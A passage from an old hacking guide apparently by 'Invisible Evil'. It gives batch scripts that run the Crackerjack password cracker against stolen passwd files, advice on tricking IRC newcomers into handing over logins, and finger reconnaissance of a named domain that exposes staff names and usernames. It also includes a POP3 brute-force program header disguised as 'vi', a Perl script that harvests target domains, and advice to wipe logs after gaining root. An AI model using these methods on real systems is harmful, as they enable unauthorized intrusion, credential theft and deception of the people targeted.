  921. used any other info like their real name or company name it will hit right away
  922. and you will not have to wait for the program to search through a word file.
  923.  
  924. If you want to hash the word file to get more out of it you can read the doc's
  925. for crackerjack.
  926.  
  927. Hashing is where you can tell crackerjack to change the case of the wordfile
  928. or even add numbers or letters to the beginning or end of the words in the word
  929. file, like sandy1 or 1sandy.  You will find that many users do this and think
  930. they are more secure.
  931.  
  932. Here are hashing files for both the passwd file and your word list.  After
  933. looking these over you will see how you can modify these or create new ones
  934. to suit your needs.
  935.  
  936. ------------ start of dicthash.bat
  937. @echo off
  938. cls
  939. echo - THIS FILE FOR DOS MACHINES
  940. echo ----------------------------------------------------------------------
  941. echo - To work this batch file have all of the crackerjack files in the
  942. echo - current directory with this batch file, along with your dict and
  943. echo - password file.  Then use this batch file using the following format:
  944. echo -
  945. echo - dicthash.bat dictfilename.ext passwordfilename.ext
  946. echo -
  947. echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
  948. echo -
  949. echo - dicthash will first load jack running the dict file against your
  950. echo - password file in both cases, then it will add numbers 0-9 both to
  951. echo - the begining and end of every dict word.  This will take a while,
  952. echo - so go out for that week vacation!
  953. echo -
  954. echo - If you get tired you can 'ctrl c' to the next option or number.
  955. echo -
  956. echo - ii@dormroom.pyro.net
  957. echo -
  958. echo - Mail me some of your hits, let me know how this works for you ;)
  959.  
  960. jpp -lower %1 | jack -stdin %2
  961. jpp %1 | jack -stdin %2
  962. jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
  963. jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
  964. jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
  965. jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
  966. jpp  -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
  967. jpp  -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
  968. jpp  -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
  969. jpp  -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
  970. jpp  -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
  971. jpp  -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
  972. jpp  -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
  973. jpp  -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
  974. jpp  -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
  975. jpp  -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
  976. jpp  -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
  977. jpp  -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
  978. jpp  -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
  979. jpp  -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
  980. jpp  -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
  981. jpp  -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
  982. jpp  -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
  983. jpp  -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
  984. jpp  -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
  985. jpp  -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
  986. jpp  -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
  987. jpp  -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
  988. jpp  -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
  989. jpp  -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
  990. jpp  -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
  991. jpp  -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
  992. jpp  -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
  993. jpp  -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
  994. jpp  -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
  995. jpp  -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
  996. jpp  -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
  997. jpp  -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
  998. jpp  -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
  999. jpp  -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
  1000. jpp  -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
  1001. jpp  -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
  1002.  
  1003. ---------------- end of dicthash.bat
  1004.  
  1005. ---------------- start of jackhash.bat
  1006. @echo off
  1007. cls
  1008. echo - THIS FILE FOR DOS
  1009. echo ----------------------------------------------------------------------
  1010. echo - To work this batch file have all of the crackerjack files in the
  1011. echo - current directory with this batch file, along with your password file.
  1012. echo - Then use this batch file using the following format:
  1013. echo -
  1014. echo - jackhash.bat passwordfilename.ext
  1015. echo -
  1016. echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
  1017. echo -
  1018. echo - jackhash will first load jack running the passwd file against
  1019. echo - itself in both upper and lower cases, then it will add numbers 0-9
  1020. echo - both to the begining and end of every dict word.  This will take
  1021. echo - a while, so go out for that week vacation!
  1022. echo -
  1023. echo - If you get tired you can 'ctrl c' to the next option or number.
  1024. echo -
  1025. echo - ii@dormroom.pyro.net
  1026. echo -
  1027. echo - Mail me some of your hits, let me know how this works for you ;)
  1028.  
  1029. jpp -gecos:5 -lower %1 | jack -stdin %1
  1030. jpp -gecos:5 %1 | jack -stdin %1
  1031. jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1032. jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1033. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1034. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1035. jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1036. jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1037. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1038. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1039. jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1040. jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1041. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1042. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1043. jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1044. jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1045. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1046. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1047. jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1048. jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1049. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1050. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1051. jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1052. jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1053. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1054. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1055. jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1056. jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1057. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1058. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1059. jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1060. jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1061. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1062. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1063. jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1064. jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1065. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1066. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1067. jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1068. jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1069. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1070. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1071. jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
  1072. jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
  1073. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
  1074. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
  1075. jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
  1076. jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
  1077. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
  1078. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
  1079. jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
  1080. jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
  1081. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
  1082. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
  1083. jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
  1084. jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
  1085. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
  1086. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
  1087. jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
  1088. jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
  1089. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
  1090. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
  1091. jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
  1092. jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
  1093. jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
  1094. jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1
  1095.  
  1096.  
  1097. jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1098. jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1099. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1100. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1101. jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1102. jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1103. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1104. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1105. jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1106. jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1107. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1108. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1109. jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1110. jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1111. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1112. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1113. jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1114. jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1115. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1116. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1117. jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1118. jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1119. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1120. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1121. jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1122. jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1123. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1124. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1125. jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1126. jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1127. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1128. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1129. jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1130. jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1131. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1132. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1133. jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1134. jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1135. jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1136. jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1137.  
  1138.  
  1139. jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1140. jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1141. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1142. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1143. jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1144. jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1145. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1146. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1147. jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1148. jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1149. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1150. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1151. jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1152. jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1153. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1154. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1155. jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1156. jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1157. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1158. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1159. jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1160. jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1161. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1162. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1163. jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1164. jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1165. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1166. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1167. jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1168. jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1169. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1170. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1171. jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1172. jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1173. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1174. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1175. jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1176. jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1177. jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1178. jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1179.  
  1180.  
  1181. jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1182. jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1183. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
  1184. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
  1185. jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1186. jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1187. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
  1188. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
  1189. jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1190. jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1191. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
  1192. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
  1193. jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1194. jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1195. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
  1196. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
  1197. jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1198. jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1199. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
  1200. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
  1201. jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1202. jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1203. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
  1204. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
  1205. jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1206. jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1207. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
  1208. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
  1209. jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1210. jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1211. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
  1212. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
  1213. jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1214. jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1215. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
  1216. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
  1217. jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1218. jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1219. jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
  1220. jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
  1221.  
  1222. --------------- end of jackhash.bat
  1223.  
  1224. You can get password files without an account, see next chapter.
  1225.  
  1226. ------------------
  1227. Section 2B.
  1228. Talking to newbe's
  1229. ------------------
  1230.  
  1231. There are other ways to get an account without doing much work.  Park yourself
  1232. on an irc channel that you made with a title about hacking.  Also try joining
  1233. other channels already on the irc.  Channels would include:
  1234. #hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
  1235. #hackers_hideout or any others you can find.
  1236.  
  1237. Now what you are looking for are newbe's looking to learn or exploit their shell
  1238. they are on already.  There is always someone out there that does not know as
  1239. much as you.  Watch for someone out there that asks a newbe question and gets
  1240. no answer or even kicked off the channel.  Here is your mark ;)
  1241.  
  1242. /msg him so that others can't see that you are talking to him, and begin to ask
  1243. him questions, try to help him, but not too much ;)  Finally tell him that you
  1244. can login for him and do it.  This could be to snatch the passwd file or god
  1245. knows what.  Promise him the world and get that login password.  Now you have
  1246. a start and can start your on-hands learning process.  If you get root on the
  1247. system you might not want to expose that to him, but you can feed him other
  1248. goodies that will keep him busy while you sniff some other passwords on the
  1249. system.
  1250.  
  1251. So now if there are some out there that remember i-e when you gave him your
  1252. login and password, you can be sure that the above never happened <G>rin ...
  1253.  
  1254. I tend to like to help people learn so I am telling the truth when i say I
  1255. have dealt honestly with most everyone I have come across.
  1256.  
  1257. -------------
  1258. Section 2C.
  1259. The hard way
  1260. -------------
  1261.  
  1262. There is another way you can do this.  Be sure that on most big systems
  1263. that users do not use secure passwords.  from a shell do this:
  1264.  
  1265. finger @domainname.com  Watch I will do a real domain:
  1266.  
  1267. [10:35am][/home/ii]finger @starnet.net
  1268. [starnet.net]
  1269. Login    Name                 Tty   Idle  Login Time   Office     Office Phone
  1270. chris    Chris Myers           p2   4:46  Jan 27 11:19
  1271. mike     Mike Suter            p1   4:57  Jan 22 16:14
  1272. mike     Mike Suter            p5     3d  Jan 16 15:35
  1273. root     System Administrator  p3   4:59  Jan 16 10:17
  1274. wendt    Catherine Wendt-Bern  p0      3  Jan 21 14:49
  1275. [10:35am][/home/ii]
  1276.  
  1277. Now we might want to try logging in later, log this information:
  1278.  
  1279. Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc...
  1280.  
  1281. This one looks good, wendt:Catherine:catherine
  1282.  
  1283. Here is another command:
  1284.  
  1285. [10:35am][/home/ii]finger -l @starnet.net
  1286. [starnet.net]
  1287.  
  1288.  
  1289. Login: mike                             Name: Mike Suter
  1290. Directory: /usra/staff/mike             Shell: /bin/csh
  1291. On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
  1292. On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
  1293. Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
  1294. No Plan.
  1295.  
  1296. Login: root                             Name: System Administrator
  1297. Directory: /root                        Shell: /bin/csh
  1298. On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
  1299. Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
  1300. Mail forwarded to:
  1301. \chris@admin.starnet.net
  1302. #\chris@admin.starnet.net, \mike@admin.starnet.net
  1303. No Plan.
  1304.  
  1305. Login: wendt                            Name: Catherine Wendt-Bernal
  1306. Directory: /usra/staff/wendt            Shell: /bin/csh
  1307. On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
  1308. No Plan.
  1309.  
  1310. You get more info to play with ;)
  1311.  
  1312.  
  1313. I know this can make you tired ....
  1314.  
  1315. Remember this stuff will log your tries, so if you get on and get root, clean
  1316. the logs ;)
  1317.  
  1318. Here is a small .c file you can use if you get on.
  1319.  
  1320. pop3hack.c
  1321. ----- cut here
  1322.  
  1323. #include <stdio.h>
  1324. #include <string.h>
  1325. #include <signal.h>
  1326. #include <unistd.h>
  1327. #include <sys/param.h>
  1328. #include <sys/socket.h>
  1329. #include <netinet/in.h>
  1330. #include <netdb.h>
  1331. #include <stdarg.h>
  1332.  
  1333. /* First, define the POP-3 port - almost always 110 */
  1334. #define POP3_PORT               110
  1335.  
  1336. /* What we want our program to be masked as, so nosy sys admin's don't kill us */
  1337. #define MASKAS                  "vi"
  1338.  
  1339. /* Repeat connect or not - remember, logs still report a connection, so
  1340. you might want to set this to 0. If set to 0, it will hack until it finds
  1341. 1 user/password then exit. If set to 1, it will reconnect and try more
  1342. user/passwords (until it runs out of usernames) */
  1343. #define RECONNECT       0
  1344.  
  1345. ----- cut here
  1346.  
  1347. You could also write a small perl script that will finger @ from a domain
  1348. list and cat the response to a file, then when done it will go back and try
  1349. to login using pop3d username-username (or other info) and putting the
  1350. response into another file for you.
  1351.  
  1352. You can ftp to rs.internic.net:
  1353. in the domain directory you will find:
  1354.  
  1355. com.zone.gz
  1356. edu.zone.gz
  1357. gov.zone.gz
  1358. mil.zone.gz
  1359. net.zone.gz
  1360. org.zone.gz
  1361.  
  1362. download these files and run getdomain.pl (script below) on the domains you
  1363. want to target first, in this manor:
  1364.  
  1365. "perl getdomain.pl com.zone com >com.all"
  1366.  
  1367. What this will do is rip all of the .COM domains and put them into a file
  1368. called comm.all.
  1369.  
  1370. If you wanted to do all of the .EDU addresses you would type:
  1371.  
  1372. perl getdomain.pl edu.zone edu >edu.all
  1373.  
  1374. Now you will have a list to use with your probe called edu.all
  1375.  
  1376. Here is the perl script
  1377.  
  1378. getdomain.pl
  1379. ---- cut here
  1380. #!/usr/bin/perl
  1381.  
  1382. # GetDomain By Nfin8 / Invisible Evil
  1383. # Questions /msg i-e  or  /msg i^e
  1384. #
  1385. # Retrieve command line arguments.
  1386. my($inputfile, $domain) = @ARGV;
  1387. usage() if (!defined($inputfile) || !defined($domain));
  1388.  
  1389. # Open and preprocess the input file.
  1390. open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n");
  1391. my(@lines) = <INFILE>;
  1392.  
  1393. # Initialize main data structure.
  1394. my(%hash) = {};
  1395. my($key) = "";
  1396.  
  1397. foreach (@lines) {
  1398.   $key = (split(/\ /))[0];
  1399.   chop($key);
  1400.   next if ((($key =~ tr/.//) < 1) || 
  1401.             (uc($domain) ne uc(((split(/\./, $key))[-1]))) || 
  1402.             ($key =~ m/root-server/i));
  1403.   $hash{$key}++;
  1404. }
  1405.  
  1406. # Close input file and output data structure to STDOUT.
  1407. close(INFILE);
  1408.  
  1409. foreach (sort(keys(%hash))) {
  1410.   print "$_\n";
  1411. }
  1412.  
  1413. sub usage {
  1414.   print("\n\ngetdomain:\n");
  1415.   print("Usage: getdomain [inputfile] [search]\n\n");
  1416.   print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
  1417.   exit(0);
  1418. }
  1419.   
  1420. 0;
  1421.   
  1422. ---- cut here - end of script -----
  1423.  
  1424. To use the script above all you need to do is copy between the lines above
  1425. and name it getdomain.pl, now copy it into the unix os and type
  1426. chmod +x getdomain.pl
  1427.  
  1428. Now it is ready to run with the command lines above.
  1429.  
  1430. ------------------------------------------
  1431. Section 2D.
  1432. using Mount to gain access to unix systems
  1433. ------------------------------------------
  1434.  
  1435. This is not hard to do and there are many systems out there that are mountable.
  1436. Mount is a command in unix that will allow you to mount remote machines drives
  1437. you yours.  This is done so you can do installs from other machines, or just
  1438. share drives or directories across the network.  The problem is that many
  1439. admins are good with unix commands or setup.  Or maybe they are just plain
  1440. lazy and mount the drives with world access not understanding that the world
  1441. can mount the drive and gain write access to their users directories.
  1442.  
  1443. What you will need to get started here is a hacked root account.  To be able to
